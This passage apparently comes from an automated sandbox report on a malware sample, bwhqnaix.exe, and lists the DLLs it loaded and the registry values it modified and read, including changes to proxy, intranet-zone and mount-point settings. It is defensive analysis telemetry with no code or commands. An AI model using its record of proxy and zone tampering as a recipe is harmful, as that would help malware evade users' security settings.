C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​SETUPAPI.dll  0x77920000  0x000F3000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​msv1_0.dll  0x77C70000  0x00024000 
C:\​WINDOWS\​system32\​SHLWAPI.dll  0x77F60000  0x00076000 
C:\​WINDOWS\​system32\​SHELL32.dll  0x7C9C0000  0x00817000 

4.a) bwhqnaix.exe - Registry Activities

  - Registry Values Modified:  
Key Name New Value
HKLM\​SYSTEM\​CURRENTCONTROLSET\​HARDWARE PROFILES\​CURRENT\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info ProxyEnable 
HKLM\​Software\​Microsoft\​DirectDraw\​MostRecentApplication  ID  1246043638 
HKLM\​Software\​Microsoft\​DirectDraw\​MostRecentApplication  Name  bwhqnaix.exe 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Common AppData  C:\​Documents and Settings\​All Users\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​{d14d83ce-7d74-11dc-97e2-806d6172696f}\​  BaseClass  Drive 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​{d14d83cf-7d74-11dc-97e2-806d6172696f}\​  BaseClass  Drive 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cookies  C:\​Documents and Settings\​user\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  History  C:\​Documents and Settings\​user\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Personal  C:\​Documents and Settings\​user\​My Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info AutoDetect 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info IntranetName 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info ProxyBypass 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info UNCAsIntranet 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  info SavedLegacySettings  0x460000006900000001000000000000000000000000000000040000000000 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SOFTWARE\​CLASSES\​.EXE    exefile 
HKLM\​SOFTWARE\​CLASSES\​CLSID\​{20D04FE0-3AEA-1069-A2D8-08002B30309D}\​INPROCSERVER32    %SystemRoot%\​system32\​SHELL32.dll 
HKLM\​SOFTWARE\​CLASSES\​DIRECTORY  AlwaysShowExt   
HKLM\​SOFTWARE\​CLASSES\​DRIVE\​SHELLEX\​FOLDEREXTENSIONS\​{FBEB8A05-BEEE-4442-804E-409D6C4515E9}  DriveMask  32 
HKLM\​SOFTWARE\​CLASSES\​MIME\​DATABASE\​CONTENT TYPE\​TEXT/HTML  Extension  .htm  10 
HKLM\​SOFTWARE\​Microsoft\​CTF\​SystemShared\​  CUAS 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnablePunycode 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  UrlEncoding  0x00000000 
HKLM\​SYSTEM\​CurrentControlSet\​Control\​Session Manager  CriticalSectionTimeout  2592000 
HKLM\​SYSTEM\​CurrentControlSet\​Services\​Winsock\​Parameters  Transports  0x5400630070006900700000004e0065007400420049004f00530000000000 
HKLM\​SYSTEM\​Setup  OsLoaderPath  \​ 
HKLM\​SYSTEM\​Setup  SystemPartition  \​Device\​HarddiskVolume1 
HKLM\​SYSTEM\​Setup  SystemSetupInProgress 
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Bug!  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Bug!  ID  0x3d620932 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Bug!  Name  BUG!.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​DemolitionDerby2  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​DemolitionDerby2  ID  0x44838832 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​DemolitionDerby2  Name  DD2.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MortalKombat3  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MortalKombat3  ID  0xfc6de731 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MortalKombat3  Name  MK3W.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MsGolf98  Flags  0x20000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MsGolf98  ID  0x0dea1a35 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MsGolf98  Name  game.exe 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NHLPowerPlay  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NHLPowerPlay  ID  0xff3fbf31 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NHLPowerPlay  Name  PP96.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NortonSystemInfo  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NortonSystemInfo  ID  0x29ea6332 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NortonSystemInfo  Name  SI32.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Rogue Squadron  Flags  0x40000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Rogue Squadron  ID  0xd1d74c36 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Rogue Squadron  Name  ROGUE SQUADRON.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Savage  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Savage  ID  0x00876531 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Savage  Name  SAVAGE32.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ScorchedPlanet  Flags  0x02000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ScorchedPlanet  ID  0x69044c32 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ScorchedPlanet  Name  SPLANETW.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  ID  ] 5V 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  Name  A10SIM.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  ID  0x66cb9533 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  Name  TERAWIN.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  ID  0xbf817f32 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  Name  t3rd.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  ID  m[M3 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  Name  BEND3DIM.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  ID  0x46fc4b33 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  Name  WBD3D.EXE 
HKLM\​Software\​Microsoft\​Internet Explorer\​Main\​FeatureControl\​FEATURE_BEHAVIORS 
HKLM\​Software\​Microsoft\​Internet Explorer\​Main\​FeatureControl\​FEATURE_DISABLE_MK_PROTOCOL 
HKLM\​Software\​Microsoft\​Rpc\​SecurityService  10  secur32.dll 
HKLM\​Software\​Microsoft\​Tracing  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  ConsoleTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableFileTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileDirectory  %windir%\​tracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  MaxFileSize  1048576 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  AllUsersProfile  All Users 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  DefaultUserProfile  Default User 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  ProfilesDirectory  %SystemDrive%\​Documents and Settings  10 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileImagePath  %SystemDrive%\​Documents and Settings\​user 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  CommonFilesDir  C:\​Program Files\​Common Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  DevicePath  %SystemRoot%\​inf 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  ProgramFilesDir  C:\​Program Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common AppData  %ALLUSERSPROFILE%\​Application Data 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​Domains\​\​msn.com     
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​Domains\​\​msn.com\​related  http 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  DriverCachePath  %SystemRoot%\​Driver Cache 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  LogLevel 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  ServicePackCachePath  c:\​windows\​ServicePackFiles\​ServicePackCache 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  ServicePackSourcePath  c:\​windows\​ServicePackFiles 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  SourcePath  D:\​ 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ComputerName\​ActiveComputerName  ComputerName  USER 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Capabilities  16464 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Comment  Digest SSPI Authentication Package 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Name  Digest 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  RpcId  65535 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  TokenSize  65535 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Type  49 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Version 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Capabilities  55 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Comment  DPA Security Package 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Name  DPA 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  RpcId  17 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  TokenSize  768 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Type  49 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Version 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Capabilities  55 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Comment  MSN Security Package 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Name  MSN 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  RpcId  18 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  TokenSize  768 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Type  49 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Version 
HKLM\​System\​CurrentControlSet\​Control\​MediaProperties\​PrivateProperties\​Joystick\​Winmm  wheel 
HKLM\​System\​CurrentControlSet\​Control\​ProductOptions  ProductType  WinNT 
HKLM\​System\​CurrentControlSet\​Control\​SecurityProviders  SecurityProviders  msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll 
HKLM\​System\​CurrentControlSet\​Control\​SecurityProviders\​SaslProfiles  GSSAPI  Kerberos 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  ComSpec  %SystemRoot%\​system32\​cmd.exe  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  FP_NO_HOST_CHECK  NO  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  NUMBER_OF_PROCESSORS  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  OS  Windows_NT  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PATHEXT  .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_ARCHITECTURE  x86  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_IDENTIFIER  x86 Family 6 Model 3 Stepping 3, GenuineIntel  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_LEVEL  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_REVISION  0303  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  Path  %SystemRoot%\​system32;%SystemRoot%;%SystemRoot%\​System32\​Wbem  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TEMP  %SystemRoot%\​TEMP  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TMP  %SystemRoot%\​TEMP  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  windir  %SystemRoot%  10 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Domain   
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Hostname  user 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  UseDomainNameDevolution 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  HelperDllName  %SystemRoot%\​System32\​wshtcpip.dll 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  Mapping  0x0b0000000300000002000000010000000600000002000000010000000000 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MaxSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MinSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  UseDelayedAcceptance 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters  WinSock_Registry_Version  2.0 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Num_Catalog_Entries 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  DisplayString  Tcpip 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  ProviderId  0x409d05229e7ecf11ae5a00aa00a7112b 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  SupportedNameSpace  12 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  DisplayString  NTDS 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  LibraryPath  %SystemRoot%\​System32\​winrnr.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  ProviderId  0xee37263b80e5cf11a55500c04fd8d4ac 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  SupportedNameSpace  32 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  DisplayString  Network Location Awareness (NLA) Namespace 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  ProviderId  0x3a244266a83ba64abaa52e0bd71fdd83 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  SupportedNameSpace  15 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Next_Catalog_Entry_ID  1012 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Num_Catalog_Entries  11 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000001  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000002  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000003  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000004  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000005  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000006  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000007  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000008  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000009  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000010  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000011  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​Setup  SystemSetupInProgress 
HKLM\​System\​WPA\​PnP  seed  1374283966 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TEMP  %USERPROFILE%\​Local Settings\​Temp  10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TMP  %USERPROFILE%\​Local Settings\​Temp  10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  CertificateRevocation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  DisableCachingOfSSLPages 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableHttp1_1 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableNegotiate 
